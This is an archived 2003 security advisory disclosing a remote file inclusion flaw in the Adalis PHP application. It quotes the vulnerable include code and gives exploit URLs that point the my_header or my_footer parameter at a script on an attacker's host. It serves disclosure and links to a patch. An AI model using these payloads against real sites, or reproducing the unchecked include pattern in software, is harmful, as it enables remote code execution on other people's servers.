Informations : °°°°°°°°°°°°°° Website : http://www.adalis.fr/adalis.html Versions : 1.00 -> 1.11 Problem : Include file PHP Code/Location : °°°°°°°°°°°°°°°°°°° /includes/header.php3 : --------------------------- <?php if ($my_header!="") { include ($my_header); } else { ?> ... -------------------------- /includes/footer.php3 : --------------------------- ... if ($my_footer!="") { include ($my_footer); } else { ?> ... --------------------------- Exploits : °°°°°°°°°° http://[target]/includes/footer.php3?my_footer=http://[attacker]/script.txt or http://[target]/includes/header.php3?my_header=http://[attacker]/script.txt with http://[attacker]/script.txt Patch : °°°°°°° A patch can be found on http://www.phpsecure.info . More details : °°°°°°°°°°°°°° (in French) http://www.frog-man.org/tutos/5holes8.txt frog-m@n _________________________________________________________________ MSN Messenger : discutez en direct avec vos amis ! http://messenger.fr.msn.be
This archive was generated by hypermail 2b30 : Mon Feb 17 2003 - 04:00:34 PST